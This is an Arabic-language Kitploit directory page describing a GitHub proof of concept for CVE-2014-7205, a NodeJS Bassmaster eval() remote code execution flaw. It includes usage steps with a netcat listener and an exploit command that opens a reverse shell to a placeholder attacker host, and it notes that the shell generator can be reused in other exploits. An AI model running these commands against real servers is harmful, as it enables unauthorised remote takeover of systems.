Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2014-7205 — Bassmaster Plugin NodeJS RCE | Kitploit
أدوات/GitHubGitHub/andrewtrube/cve-2014-7205
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتوليد شيفرة القشرة
GitHubandrewtrube/cve-2014-7205

CVE-2014-7205

Bassmaster Plugin NodeJS RCE

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات مفهوم RCE في إضافة Bassmaster لـ NodeJS

bassmaster-rce.py: سكربت بايثون لاستغلال الثغرة CVE-2014-7205. nodeshell.py: وحدة بايثون لتوليد شل عكسي لـ NodeJS

!!استخدم فقط ضد الخوادم التي لديك إذن باختبارها

ملخص

CVE-2014-7205 هي ثغرة تنفيذ أوامر عن بعد في إضافة Bassmaster لـ NodeJS. جميع الإصدارات <= 1.5.1 متأثرة. توجد الثغرة داخل الملف lib/batch.js في الدالة internals.batch حيث تستدعي eval() بإدخال المستخدم الذي لم يتم تجاوزه بشكل صحيح (ببساطة، لا يتحقق التعبير النمطي من أن الطلبات تحتوي على كود ضار).

إثبات المفهوم

  1. قم بتنزيل أو استنساخ مستودع git
  2. افتح مستمع نت كات في محطة bash nc -lvp 4444
  3. تأكد من أن bassmaster-rce.py و nodeshell.py في نفس المجلد
  4. شغّل bassmaster-rce.py python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444

أخرى

  • nodeshell.py قابل للنقل بالكامل إلى إثباتات مفاهيم واستغلالات أخرى تستخدم بايثون والتي تحتاج أيضًا إلى توليد شل عكسي لـ NodeJS
تنزيل الأداة